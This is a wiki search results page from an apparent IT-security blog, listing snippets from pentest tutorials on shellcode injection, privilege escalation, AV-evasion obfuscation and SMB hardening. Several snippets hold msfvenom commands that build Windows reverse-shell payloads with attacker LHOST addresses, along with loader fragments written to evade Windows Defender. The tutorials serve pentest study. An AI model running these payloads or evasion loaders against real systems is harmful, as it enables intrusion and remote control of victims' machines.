Search
The results of your search are listed below.
Matching page names:
Full-text results:
- FatCat Attack PoC @en:it-security:blog
- | Privilege Escalation((https://github.com/frizb/Windows-Privilege-Escalation)) | AlwaysInstallElevated ((https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated)) | | @#58D3F7:**Actions on Objectives*... rate payload <code dos>msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.
- Obfuscation: Disguise shellcode as UUIDs @en:it-security:blog
- {{tag>IT-Security Windows Kali pentest obfuscation blog english}} ====== Obfuscation: Disguise shellcode a... hat I used for testing was immediately blocked by Windows Defender. I therefore had to adapt the loader and... yption or encoding. This is usually recognised by Windows Defender. <code bash> python shencode.py create -c="-p windows/x64/shell/reverse_tcp LHOST=IPADDRESS LPORT=PORT
- Privilege escalation: Windows admin thanks to Linux @en:it-security:blog
- {{tag>it-security windows linux blog english}} ====== Privilege escalation: Windows admin thanks to Linux ====== In this tutorial, ... ll show you how to secure administrator rights on Windows PCs using a live boot CD. We will simulate two sc... ystem. \\ \\ ===== Initial situation ===== On a Windows system, the users ''users'' and ''sysadmin'' are
- SMB Hardening
- {{tag>english startpage it-security windows active-directory}} ====== SMB Hardening ====== ===== Technical... ights required) as follows: <code powershell>Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol<... ell (restart required): <code powershell>Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol<... und here: <code> Computerkonfiguration -> Windows-Einstellungen -> Sicherheitseinstellungen
- Shellcode Injection Part 2 @en:it-security:blog
- {{tag>it-security windows kali pentest blog english}} ====== Shellcode Injection Part 2 ====== {{it-securi... . This form of injection is usually recognised by Windows Defender, so we will again use some obfuscation m... r. The output is binary: <code bash> msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.28.126.97 LPORT=4... ub.com/fritzone/obfy )) was an immediate success. Windows Defender could no longer recognise the compiled f
- Shellcode Injection Part 1 @en:it-security:blog
- {{tag>it-security windows kali pentest blog english}} ====== Shellcode Injection Part 1 ====== In this ser... ve to the file shell.c | <code bash> msfvenom -p windows/shell_reverse_tcp LHOST=172.23.61.130 LPORT=445 -... ocess-injection.cpp> #include <stdio.h> #include <Windows.h> //shell.c unsigned const char payload[] = "\... shellcode in raw format: <code bash> msfvenom -p windows/shell_reverse_tcp LHOST=172.23.61.130 LPORT=445 -
- Group Managed Service Accounts
- {{tag>english startpage it-security windows active-directory}} ====== Group Managed Service Accounts ======... from Microsoft on this: > As of the October 2018 Windows 10 update, RSAT is included as a collection of features on demand in Windows 10 itself. Instead of downloading an RSAT package... es page. <sup>[[https://learn.microsoft.com/de-de/windows-server/remote/remote-server-administration-tools]
- Shellcode Injection Part 3 @en:it-security:blog
- {{tag>IT-Security Windows Kali pentest blog english}} ====== Shellcode Injection Part 3 ====== {{it-securi... ile 143 / +7 marks the beginning of the filename (WindowsAgent.py) lea edx, [esi + 7] ;Line 184 / command line to execute db "python WindowsAgent.py", 0 ;Line 192 / our URL db "http://172... e === We have to create the shellcode as ''%%x86 Windows%%'' binary file. We do this with ''%%nasm%%'': <
- Shellcode Injection Part 4 @en:it-security:blog
- {{tag>IT-Security Windows Kali pentest blog english}} ====== Shellcode Injection Part 4 ====== {{it-securi... ts should be met: * Start of ''calc.exe'' on a Windows computer * 64-bit code * Avoid null bytes ==... e address ==== Each time a process is started in Windows, modules are loaded into this process. One of these modules is our ''kernel32.dll''. Windows creates data structures in the working memory tha
- Obfuscation: polymorphic in-memory decoder @en:it-security:blog
- {{tag>IT-Security Windows Kali pentest obfuscation blog english}} ====== Obfuscation: polymorphic in-memor... pile it. <code cpp> #include <stdio.h> #include <windows.h> #include <iostream> #pragma warning unsigned ... on tests. During my test, even the Metasploit payload was not detected by Windows Defender. ~~DISCUSSION~~
- IT Security Cheat Sheets
- ecurity bypass bins | [[ghio>gtfobins ]] | ^::: | Windows security bypass bins | [[ghio>lolbas-project ]] |... ed | [[gh>aleff-github/my-flipper-shits/tree/main/Windows/Execution/Install_And_Run_Any_Arbitrary_Executabl
- Secure passwords
- password for each site * Follow the basic [[en:windows:security:basics|Windows security tips]] * Never share passwords ===== 6.0 Multifactor authentication =
- 64-Bit Stack CheatSheet
- ed as follows ((https://learn.microsoft.com/de-de/windows-hardware/drivers/debugger/x64-architecture)) ((ht
- The importance of awareness in IT security @en:it-security:blog
- file that was sent as an attachment in an email. Windows integrated it and the malware was able to spread.